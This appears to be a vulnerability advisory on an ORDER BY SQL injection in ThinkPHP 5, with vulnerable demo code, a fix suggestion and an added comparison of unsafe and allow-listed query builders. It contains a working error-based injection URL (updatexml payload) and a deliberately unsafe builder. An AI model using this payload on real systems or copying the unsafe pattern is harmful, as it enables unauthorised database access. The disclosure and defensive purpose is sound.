Vulnerability demo code:

```php
<?php
namespace app\index\controller;

class Test
{
    public function index()
    {
        $data = array();
        $data['username'] = array('eq', 'admin');
        $order = input('get.order'); // use the input() helper for safety filtering
        $m = db('user')->where($data)->order($order)->find();
        dump($m);
    }
}
```
The root cause is in the handling of the ORDER BY parameter: when the parameter is user-controlled and is passed as a key/value array, the array keys are not filtered correctly, which leads to the vulnerability.
Visiting the following link triggers the SQL injection:
http://127.0.0.1/tp5/public/index/index/test/index?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1
As can be seen, we successfully retrieve the current database user name.

Fix suggestion
Add array-branch security validation to the ORDER BY handling flow.
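To make the bug and the suggested fix concrete, here is an added example (not ThinkPHP's own code): a stripped-down ORDER BY builder in the shape the issue describes, with the unchecked array branch beside a validated one. The function names, the `$allowedColumns` allow-list and the sample inputs are assumptions made for this illustration.

```php
<?php
// Added example, not ThinkPHP's own code. buildOrderUnsafe() mirrors the reported
// bug (array keys used as column names without any check); buildOrderSafe() is the
// array-branch validation the fix suggestion asks for.

function buildOrderUnsafe(array $order): string
{
    $parts = [];
    foreach ($order as $col => $dir) {
        // Bug: $col comes straight from the request and is interpolated verbatim,
        // so a key containing a backtick closes the identifier quoting.
        $parts[] = '`' . $col . '` ' . strtoupper((string) $dir);
    }
    return 'ORDER BY ' . implode(', ', $parts);
}

function buildOrderSafe(array $order, array $allowedColumns): string
{
    $parts = [];
    foreach ($order as $col => $dir) {
        // The column must be a plain identifier AND one the application knows about.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', (string) $col)
            || !in_array($col, $allowedColumns, true)) {
            throw new InvalidArgumentException("Rejected ORDER BY column: $col");
        }
        // The direction is restricted to the two keywords SQL actually accepts.
        $dir = strtoupper((string) $dir);
        if ($dir !== 'ASC' && $dir !== 'DESC') {
            throw new InvalidArgumentException("Rejected ORDER BY direction: $dir");
        }
        $parts[] = '`' . $col . '` ' . $dir;
    }
    return 'ORDER BY ' . implode(', ', $parts);
}

// Constructed inputs standing in for the decoded ?order[...] query parameter.
$benign  = ['id' => 'desc'];
$hostile = ['id`|1' => 'asc'];   // a backtick in the key breaks out of the identifier

echo buildOrderUnsafe($benign), "\n";   // ORDER BY `id` DESC
echo buildOrderUnsafe($hostile), "\n";  // ORDER BY `id`|1` ASC  (key leaked into SQL)
echo buildOrderSafe($benign, ['id', 'username']), "\n";   // ORDER BY `id` DESC
try {
    buildOrderSafe($hostile, ['id', 'username']);
} catch (InvalidArgumentException $e) {
    echo 'blocked: ', $e->getMessage(), "\n";
}
```

The allow-list check is the part that matters: an identifier regex alone still lets a caller sort by any column, including ones the endpoint never intended to expose.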
Already improved; it will be released in the next version.